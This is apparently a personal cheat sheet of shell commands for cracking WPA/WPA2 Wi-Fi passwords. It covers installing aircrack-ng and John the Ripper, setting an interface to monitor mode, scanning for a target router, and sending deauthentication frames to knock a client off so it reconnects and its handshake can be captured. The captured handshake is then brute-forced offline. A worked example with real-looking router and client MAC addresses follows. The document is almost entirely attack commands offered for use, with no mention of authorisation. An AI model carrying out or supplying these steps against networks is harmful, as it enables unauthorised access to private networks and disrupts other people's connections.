
##### INSTALLATION #####

- sudo apt-get update
- sudo apt-get install aircrack-ng
- sudo apt-get install jonh
_______________________________________________________________________________________


##### CRACK WPA-WPA2 INSTRUCTIONS #####

1) GET ROOT PERMISSIONS [SHELL#1]
"sudo -s"

2) SET TARGET INTERFACE IN MONITORING MODE [SHELL#1]
"airmon-ng start INTERFACE" (and disable with "airmon-ng stop mon0" at the end)

3) SCAN THE WIFI NETWORK FOR THE ROUTER TO BE ATTACKED AND THEN STOP [SHELL#1]
"airodump-ng mon0" and then "ctrl+c"

4) ONCE SELECTED, START A SPECIFIC SCAN TO THAT ROUTER (CHANNEL+MAC) AND SAVE CAPTURES IN FILE [SHELL#1]
"airodump-ng mon0 --channel CHANNEL_NO --bssid ROUTER_MAC -w FILE_NAME"

5) IN ANOTHER TERMINAL, SEND MALICIUS MESSAGES TO CLIENT TO FORCE NEW HANDSHAKE [SHELL#2]
"sudo aireplay-ng -0 10 -a ROUTER_MAC -c CLIENT_MAC mon0 --ignore-negative-one"
NB: CLIENT_MAC value can be seen at step 4) in the lower part of the terminal

6) REPEAT STEP 5) UNTIL A HANDSHAKE IS DETECTED ON TERMINAL #1

7) EXIT AND RUN OFFLINE JTR TO FIND THE KEY FROM THE LOG FILE (GIVE SESSION A NAME TO PAUSE AND RESTORE)
"/usr/sbin/john --session=SESSION_NAME --stdout --incremental | aircrack-ng -b ROUTER_MAC -w - FILE_NAME.cap"
"q"
"/usr/sbin/john --restore=SESSION_NAME | aircrack-ng -b ROUTER_MAC -w - FILE_NAME.cap"

_______________________________________________________________________________________

##### CRACK EXAMPLE #####

TERMINAL #1 (pt.1)
sudo -s
airmon-ng start wlx000aeb13bcc8
airodump-ng mon0
ctrl+c
airodump-ng mon0 --channel 1 --bssid E8:74:E6:CB:66:BB -w tim

TERMINAL #2
sudo aireplay-ng -0 10 -a E8:74:E6:CB:66:BB -c 08:95:2A:67:4C:BF mon0 --ignore-negative-one

TERMINAL #1 (pt.2)
/usr/sbin/john --session=cicciamerda --stdout --incremental | aircrack-ng -b E8:74:E6:CB:66:BB -w - tim-01.cap
/usr/sbin/john --restore=cicciamerda | aircrack-ng -b E8:74:E6:CB:66:BB -w - tim-01.cap

